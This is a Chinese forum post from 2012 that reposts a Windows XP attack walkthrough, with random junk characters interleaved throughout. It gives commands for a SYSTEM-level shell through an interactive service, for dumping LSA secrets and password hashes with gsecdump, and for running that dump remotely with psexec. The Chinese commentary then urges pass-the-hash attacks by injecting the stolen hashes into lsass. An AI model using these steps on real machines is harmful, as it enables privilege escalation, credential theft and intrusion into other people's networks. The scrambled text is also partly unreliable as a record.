o get a DOS Prompt as NT system:. l$ w3 D: z8 T* I }
. K: B( U7 h; A$ j
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
5 H. F+ h' O- w* i: b5 i# F" J: f$ `5 o[SC] CreateService SUCCESS" c- u( f- E* G
' B2 j. h4 m$ B. XC:\>sc start shellcmdline
5 f+ e" o0 P% ]$ V6 }[SC] StartService FAILED 1053:
3 j4 ]; s9 a9 n4 d d% G& _5 @# c' b; H0 ~0 u5 X
The service did not respond to the start or control request in a timely fashion. i. W+ }1 U/ A1 \5 v2 j
! q+ R/ M6 N3 w2 T& J4 w6 L
C:\>sc delete shellcmdline: B( V8 E% K5 }4 i9 a; o6 b0 D* G
[SC] DeleteService SUCCESS' K, B, z8 X5 B" C9 B$ p f \4 r
4 U9 a4 M4 T* {8 X2 v
------------
. K' }7 P% ^& h! _( a# Z; o% c* \9 |$ W$ A& Q7 W
Then in the new DOS window:
; r; N9 O- D/ T
/ j1 {; o) d6 R! S# r) HMicrosoft Windows XP [Version 5.1.2600] i4 P# a! ^2 h$ }# _5 V, C6 R, {# V
(C) Copyright 1985-2001 Microsoft Corp.
. I" |9 `& N% d9 z/ f" _
0 m8 R9 t o% j$ ~+ t/ c6 ~C:\WINDOWS\system32>whoami8 ?( O$ @% a1 g# J1 G2 o9 Y
NT AUTHORITY\SYSTEM
- E. _ W6 w; ]* t( J
( u7 f% T9 b$ ?; JC:\WINDOWS\system32>gsecdump -h
/ j3 z: S# |9 @8 pgsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
. v5 V" T+ w, z9 B& Qusage: gsecdump [options]" F; s6 I$ U5 V9 ]& s" k, _/ C
3 W, c, p4 Q# n: s% Q0 p! L3 Toptions:
' z9 c: M# E% ^. O% z9 s9 }$ ]7 K-h [ --help ] show help5 ]$ [/ v# T$ ^; g( C/ _$ u
-a [ --dump_all ] dump all secrets
5 ?* q! ^: q$ I5 d3 V( K2 _-l [ --dump_lsa ] dump lsa secrets
' L8 V9 |3 _8 i# X6 i/ `-w [ --dump_wireless ] dump microsoft wireless connections& d4 |7 x. @" {7 W; o$ k( N
-u [ --dump_usedhashes ] dump hashes from active logon sessions$ S4 u% I1 }1 q8 ~1 |% D [1 ^
-s [ --dump_hashes ] dump hashes from SAM/AD$ T4 @" v9 a( Q& r$ \
, t& z+ s1 ]0 M: d3 LAlthough I like to use:
" C2 P& U8 k* `( V C7 y# Y. |
9 c' f$ ~. l6 g# R7 Q, P* EPsExec v1.83 - Execute processes remotely8 h/ |3 M/ Y z/ {' _" U' n
Copyright (C) 2001-2007 Mark Russinovich
M4 `" a: W. V# C$ q" WSysinternals - 链接标记[url]www.sysinternals.com[/url]8 _& _1 G2 G2 t8 k
% v$ w# X! s& c% f9 l0 e7 X3 X
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT1 r" u8 x' m* \+ V3 \
. Q v: P& j/ }9 ~1 hto get the hashes from active logon sessions of a remote system.: m" u( ?* @5 f- n
- M: T3 y- H+ J- F
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables./ ^) F: C4 c( x |
+ l9 q# P% `/ A* v提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.2 V1 J7 [+ e$ l$ o7 u4 \
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]; p; A/ j9 x2 A% ?, X, x0 z
% O* g. O% B: G, V0 U& r3 \' g我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
1 B5 z" E: t1 |3 c6 F) m1 I; b |
发表于 2012-11-6 21:09:29
收藏
支持
反对